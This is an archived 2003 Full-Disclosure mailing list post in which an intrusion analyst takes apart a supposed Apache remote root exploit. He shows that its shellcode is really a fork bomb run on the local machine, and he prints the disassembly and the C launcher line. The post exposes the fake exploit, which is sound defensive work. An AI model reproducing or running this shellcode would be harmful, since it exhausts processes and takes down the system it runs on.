lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <200306201304.52502.jstewart@lurhq.com>
From: jstewart at lurhq.com (Joe Stewart)
Subject: Apache 1.3.27 Remote Root 0-Day

On Friday 20 June 2003 11:15 am, Michael wrote:
> Maybe now we can STFU and concentrate on actual disclosure?
> I'm curious as to why there has been no discussion about this apache
> report.
>
> The poster of this message didnt include any info on the details of the
> problem nor an exploit, which leaves us wondering.  (The insult was cute
> though)

There was exploit code included in the message I got. Taking apart the
shellcode we see:

   0:   31 db                   xor    %ebx,%ebx
   2:   31 c0                   xor    %eax,%eax
   4:   31 d2                   xor    %edx,%edx
   6:   b2 18                   mov    $0x18,%dl 
   8:   68 20 3f 21 0a          push   $0xa213f20        ; " ?!\n"
   d:   68 54 52 31 58          push   $0x58315254      ; "TR1X"
  12:   68 65 20 4d 34          push   $0x344d2065      ; "e M4"
  17:   68 73 20 54 68          push   $0x68542073      ; "s Th"
  1c:   68 61 74 20 69          push   $0x69207461      ; "at i"
  21:   68 2d 2d 57 68          push   $0x68572d2d      ; "--Wh"
  26:   89 e1                   mov    %esp,%ecx        ; pointer to string
  28:   b0 04                   mov    $0x4,%al
  2a:   cd 80                   int    $0x80            ; syscall_write
  2c:   b8 02 00 00 00          mov    $0x2,%eax
  31:   cd 80                   int    $0x80            ; syscall_fork
  33:   eb f7                   jmp    0x2c	; loop
... garbage code follows

So, the shellcode is a fork bomb, printing "--What is The M4TR1X ?!" 
over and over until the system can no longer fork processes.

Looking at the C code, we see this line:
void(*b)()=(void*)shellcode;b();

Which executes the shellcode locally. In other words, don't run this.

-Joe

-- 
Joe Stewart, GCIH 
Senior Intrusion Analyst
LURHQ Corporation
http://www.lurhq.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ